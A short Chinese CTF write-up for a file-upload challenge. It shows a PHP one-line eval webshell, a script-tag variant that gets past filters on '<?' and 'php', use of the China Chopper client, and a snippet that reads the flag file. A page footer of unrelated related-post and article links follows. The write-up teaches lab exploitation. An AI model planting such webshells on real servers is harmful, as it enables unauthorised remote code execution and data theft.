首先把包含一句话的文件上传,php内容文件如下:

<?php
eval($_POST['a']);
?>

如果会过滤 <? 和 php 关键字,可以使用长标签

<script language="pHp">@eval($_POST['sb'])</script>

打开中国菜刀主页面,右键点击添加,配置如下(密码即上面的sb)

点击右键文件管理如下:

即可获得flag:

还有一种直接在上传文件的php代码中获取flag文件的内容:

<script language="PHP">
$fh=fopen("../flag.".strtolower("PHP"),'r');    #strtolower() 函数把字符串转换为小写
echo fread($fh,filesize("../flag.".strtolower("PHP"))); #点号.是连接符,开始还用+号来连接,搞错了。
fclose($fh);
</script>

点击右键查看源代码:

--参考i春秋https://www.ichunqiu.com/battalion

中国菜刀使用教程--ctf 文件上传相关推荐

  1. 上传漏洞(一句话木马、中国菜刀使用、DVWA文件上传漏洞利用)

    1.常见漏洞分类 2.常见验证手段 可抓包后修改扩展名为图片格式,再上传可绕过验证.如: 可以修改php文件后缀为其他,再上传.如test.php.xxx  可对图片文件添加一句话木马,再修改为.ph ...

  2. 超详细的实现上传文件功能教程,文件上传实现。

    重要声明:本文章仅仅代表了作者个人对此观点的理解和表述.读者请查阅时持自己的意见进行讨论. 本文更新不及时,请到原文地址浏览:<超详细的实现上传文件功能教程,文件上传实现.>. 一.文件上 ...

  3. ctf文件上传基本思路+例题

    目录 简介 一句话木马 蚁剑 例题 总结思路 附言 简介 文件上传本质上就是将文件传输到服务器时没有做好检测和过滤,导致可上传恶意程序到服务器,从而获得后台权限来干点坏事.一般这个恶意脚本文件称为we ...

  4. i春秋-ctf 文件上传

    文章目录 前言 一.题目 二.解题步骤 1.我的错误思路 2.正确解题姿势 总结 前言 CTF小白,这道题思考了很久,i春秋上现在也没write up,卡了1天了,后面在buuctf找到了题解答.通过 ...

  5. bottle 文件服务器,python bottle 框架基础教程:文件上传 | linux系统运维

    文件上传,需要注意的是前端html的form表单中,要添加 enctype="multipart/form-data"属性,否则无法上传文件.在后端,用request.files方 ...

  6. struts2教程--实现文件上传下载

    Struts2文件上传下载 一.Struts2文件上传 提供 FileUpload 拦截器,用于解析 multipart/form-data 编码格式请求,解析上传文件的内容 fileUpload拦截 ...

  7. spring boot基础教程之文件上传下载

    一文件上传 文件上传主要分以下几个步骤: (1)新建maven java project: (2)在pom.xml加入相应依赖: (3)新建一个文件上传表单页面; (4)编写controller; ( ...

  8. 菜鸟教程php 文件上传,php入门学习知识点三 PHP上传

    if(is_uploaded_file($_FILES["Imgs"]["tmp_name"])){ $phpupfile=$_FILES["Imgs ...

  9. Flask 的完全使用教程(文件上传下载,cookie,session,template使用)

    Flash是python下的一个轻量级web服务框架,通过Flash可以快速的搭建api服务器和各位网站,在深度学习中Flash用的最多的就是模型的部署.配合上一些c++ dll库的调用,比如这个库( ...

最新文章

  1. 华为: 即将发布5G+VR的颠覆式智能眼镜
  2. 关于如何在Nomad中保护工作部署的工作流的简要历史
  3. 转载:Linux 的系统服务及其配置(略有修改)
  4. Qt Creator和VS2010中添加槽信号_差异与详解
  5. java排序-交换排序-快速排序
  6. Angularjs1.x 项目结构
  7. LoRa、Sigfox和NB-IoT在物联网趋势中谁是你的最佳拍档?
  8. 析构函数virtual与非virtual区别
  9. 配置Redis主从复制
  10. 自学it18大数据笔记-第二阶段Hive-day4——会持续更新……
  11. Bitmap存储入门
  12. 20 ViewPager Demo4自动轮播
  13. layui 自定义request_Layui自定义模块的使用方式
  14. C#实现Zip文件解压
  15. Android 常用开发工具以及Mac常用软件
  16. 硬件工程师成长之路(2)——电路设计
  17. 离散型特征的处理方法
  18. 学习笔记二:接口与继承(内部类)
  19. 晶品特装在科创板上市:总市值约为48亿元,前三季度收入下滑12%
  20. 冰箱中的爱马仕没跑了,用COLMO来开启你的美好新春吧

热门文章

  1. golang 设置goproxy代理的小细节,适用于go module下载超时,阿里云镜像go module下载超时
  2. Gradle sync failed: Sync failed: reason unknown
  3. ps计算机海报设计,ps海报设计心得.docx
  4. load()方法异步请求数据
  5. 【Fungus笔记】No.12:Load Scene(加载场景 / 转场)
  6. Linux命令篇:chmod 777 与 chmod +x
  7. 64位win7系统中vb工程显示加载MSCOMCTL.OCX失败
  8. 袖珍计算器c语言设计源码,Calculator 示例:Windows 窗体袖珍计算器
  9. 【学习笔记】大数据技术之Flume
  10. 外接u盘/硬盘安装CentOS(linux)的步骤(含双系统)